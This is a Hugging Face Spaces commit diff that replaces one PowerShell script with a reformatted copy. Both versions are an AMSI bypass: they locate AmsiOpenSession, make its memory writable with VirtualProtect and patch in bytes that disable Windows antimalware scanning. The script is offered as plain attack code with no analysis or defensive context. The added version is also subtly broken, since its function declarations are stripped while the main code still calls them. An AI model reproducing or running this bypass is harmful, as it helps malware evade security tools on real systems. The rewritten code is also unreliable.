Hugging Face's logo

Spaces:
enotkrutoy
/
gggg
Runtime error

App Files Community
enotkrutoy commited on
Commit
44f280f
·
verified ·
1 Parent(s): 7125fb5

Update test/UTF8

Browse files
Files changed (1) hide show
  1. test/UTF8 +31 -7
test/UTF8 CHANGED
@@ -1,7 +1,31 @@
1
- [Console]::OutputEncoding = [System.Text.Encoding]::UTF8
2
-
3
- function l{Param($m,$f)Write-Host "[l] Начало выполнения функции" -ForegroundColor Green;Write-Host "[l] Параметры:ModuleName=$m,FunctionName=$f" -ForegroundColor Cyan;$a=([AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GlobalAssemblyCache-and$_.Location.Split('\\')[-1]-eq'System.dll'}).GetType('Microsoft.Win32.UnsafeNativeMethods');Write-Host "[l] Получена сборка: $($a.Assembly.FullName)" -ForegroundColor Green;$t=@();$a.GetMethods()|%{if($_.Name-eq'GetProcAddress'){$t+=$_;Write-Host "[l] Найден метод GetProcAddress" -ForegroundColor Green}};Write-Host "[l] Возврат результата" -ForegroundColor Green;$t[0].Invoke($null,@(($a.GetMethod('GetModuleHandle')).Invoke($null,@($m)),$f))}
4
-
5
- function g{Param([Type[]]$f,[Type]$d=[Void])Write-Host "[g] Начало выполнения функции" -ForegroundColor Green;Write-Host "[g] Параметры:Func=$f,DelType=$d" -ForegroundColor Cyan;$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('RD')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('IM',$false).DefineType('MDT','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate]);Write-Host "[g] Создан тип делегата: $t" -ForegroundColor Green;$t.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard,$f).SetImplementationFlags('Runtime, Managed');$t.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual',$d,$f).SetImplementationFlags('Runtime, Managed');Write-Host "[g] Возврат созданного типа" -ForegroundColor Green;$t.CreateType()}
6
-
7
- Write-Host "[Main] Начало выполнения основного кода" -ForegroundColor Yellow;$a=l amsi.dll AmsiOpenSession;Write-Host "[Main] Получен адрес AmsiOpenSession: $a" -ForegroundColor Green;$o=0;$v=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((l kernel32.dll VirtualProtect),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType())([Bool])));Write-Host "[Main] Создан делегат для VirtualProtect" -ForegroundColor Green;$v.Invoke($a,3,0x40,[ref]$o);Write-Host "[Main] Изменены права доступа к памяти" -ForegroundColor Green;[System.Runtime.InteropServices.Marshal]::Copy([byte[]](0x48,0x31,0xC0),0,$a,3);Write-Host "[Main] Записаны байты в память" -ForegroundColor Green;$v.Invoke($a,3,0x20,[ref]$o);Write-Host "[Main] Восстановлены оригинальные права доступа" -ForegroundColor Green;Write-Host "[Main] Завершение выполнения" -ForegroundColor Yellow
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Param($m,$f)
2
+ Write-Host "[l] Function execution started" -ForegroundColor Green
3
+ Write-Host "[l] Parameters: ModuleName=$m, FunctionName=$f" -ForegroundColor Cyan
4
+ $a=([AppDomain]::CurrentDomain.GetAssemblies()|?{$_.GlobalAssemblyCache -and $_.Location.Split('\\')[-1] -eq 'System.dll'}).GetType('Microsoft.Win32.UnsafeNativeMethods')
5
+ Write-Host "[l] Assembly obtained: $($a.Assembly.FullName)" -ForegroundColor Green
6
+ $t=@()
7
+ $a.GetMethods()|%{if($_.Name -eq 'GetProcAddress'){$t+=$_;Write-Host "[l] GetProcAddress method found" -ForegroundColor Green}}
8
+ Write-Host "[l] Returning result" -ForegroundColor Green
9
+ $t[0].Invoke($null,@(($a.GetMethod('GetModuleHandle')).Invoke($null,@($m)),$f))
10
+ Param([Type[]]$f,[Type]$d=[Void])
11
+ Write-Host "[g] Function execution started" -ForegroundColor Green
12
+ Write-Host "[g] Parameters: Func=$f, DelType=$d" -ForegroundColor Cyan
13
+ $t=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('RD')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('IM',$false).DefineType('MDT','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
14
+ Write-Host "[g] Delegate type created: $t" -ForegroundColor Green
15
+ $t.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard,$f).SetImplementationFlags('Runtime, Managed')
16
+ $t.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual',$d,$f).SetImplementationFlags('Runtime, Managed')
17
+ Write-Host "[g] Returning created type" -ForegroundColor Green
18
+ $t.CreateType()
19
+ Write-Host "[Main] Main code execution started" -ForegroundColor Yellow
20
+ $a=l amsi.dll AmsiOpenSession
21
+ Write-Host "[Main] AmsiOpenSession address obtained: $a" -ForegroundColor Green
22
+ $o=0
23
+ $v=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((l kernel32.dll VirtualProtect),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType()) ([Bool])))
24
+ Write-Host "[Main] Delegate for VirtualProtect created" -ForegroundColor Green
25
+ $v.Invoke($a,3,0x40,[ref]$o)
26
+ Write-Host "[Main] Memory access rights changed" -ForegroundColor Green
27
+ [System.Runtime.InteropServices.Marshal]::Copy([byte[]](0x48,0x31,0xC0),0,$a,3)
28
+ Write-Host "[Main] Bytes written to memory" -ForegroundColor Green
29
+ $v.Invoke($a,3,0x20,[ref]$o)
30
+ Write-Host "[Main] Original memory access rights restored" -ForegroundColor Green
31
+ Write-Host "[Main] Execution completed" -ForegroundColor Yellow